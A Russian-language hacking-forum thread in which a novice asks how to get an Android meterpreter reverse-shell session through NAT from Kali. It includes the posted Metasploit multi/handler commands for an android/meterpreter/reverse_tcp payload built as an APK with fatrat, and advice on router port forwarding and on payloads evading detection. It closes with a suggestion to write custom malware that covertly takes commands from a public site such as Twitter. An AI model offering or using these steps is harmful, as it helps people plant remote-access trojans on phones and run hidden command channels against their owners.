Проброс Kali за NAT

А если взять браузер и открыть локально? К примеру с браузера винды но
Ссылка скрыта от гостей
тачки с Линукс порт по умолчанию 80
 
ghostphisher сказал(а):
А если взять браузер и открыть локально? К примеру с браузера винды но
Ссылка скрыта от гостей
тачки с Линукс порт по умолчанию 80
Нажмите, чтобы раскрыть...
не понял, я должен в браузере в винде открыть этот файл через
Ссылка скрыта от гостей
, так? если так, то не открывается
 
запустил, ввел ip получилось это
 

Вложения

  • Screenshot.png
    Screenshot.png
    29,5 КБ · Просмотры: 489
NigaMan сказал(а):
запустил, ввел ip получилось это
Нажмите, чтобы раскрыть...

Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь
 
ghostphisher сказал(а):
Мана тулкит была использована? Смысл в следующем - порты у тебя норм, а это фигня похоже от твоих исптыаний разных утилит для фишинга, которые ты не зачистил. Теперь, открываешь лист порта с метасплоит и делаешь проброс его, а свой телефон на андроид юзаешь через 3G и кидаешь на него свои заготовки и тестишь
Нажмите, чтобы раскрыть...
Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?
 
NigaMan сказал(а):
Теперь, открываешь лист порта с метасплоит и делаешь проброс его, про это можно поконкретнее?
Нажмите, чтобы раскрыть...


Все тоже самое как в локальной сети делал со своим андроидом и пробрось порт, ты же делал это с 80 и 9999
 
ghostphisher сказал(а):
Все тоже самое как в локальнгй сети делал и пробрось порт, ты же делал это с 80 и 9999
Нажмите, чтобы раскрыть...
то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)
 
NigaMan сказал(а):
то есть, я запустил апачи и теперь повторяю процедуру? и про порт я не понял слегка, просто этим всего неделю, от силы 2 занимаю, и еще не все до конца понимаю)
Нажмите, чтобы раскрыть...

Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай
 
ghostphisher сказал(а):
Ты писал - что уже делал в локальнгой сети и все получилось с получением сессии. Откуда тут у тебя Апач? Ты на что принимаешь связь от запущенного файла с нагрузкой? И на какой порт? Вот на который порт ожидаешь в метиаплоите связь его и прокидывай
Нажмите, чтобы раскрыть...
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.**.**
set lport 9999
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat
 
NigaMan сказал(а):
exploit -j
все прописал, скинул apk файл на телефон запустил, но сессия так и не появляется
apk файл я создаю с помощью fatrat
Нажмите, чтобы раскрыть...


в роутере прописал что у тебя 9999 идет на 9999 ?

И еще - не факт файл сработает. Из 100 если 1 сработает уже хорошо.
 
А то что IP может быть серый? (как у меня)
 
NigaMan сказал(а):
вот скорее всего и у меня
Нажмите, чтобы раскрыть...
Таким образом могу сказать: 1) купить у провайдера белый IP адрес. Тут очень много подводных камней и проблем
2) Написать свою малварь, которая будет брать команды из доверенного места и не будет вызывать подозрений. То есть будет коннектиться к, допустим, твиттеру, парсить страничку и искать на ней комманды, которые, к примеру, будут начинаться с OMG! а дальше /SlVTVCBBIFRFU1Q=/ и выполнять то, что в //. Так кстати передавали команды ботнету со страницы перис хилтон вроде :D
 
  • Нравится
Реакции: Ondrik8
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ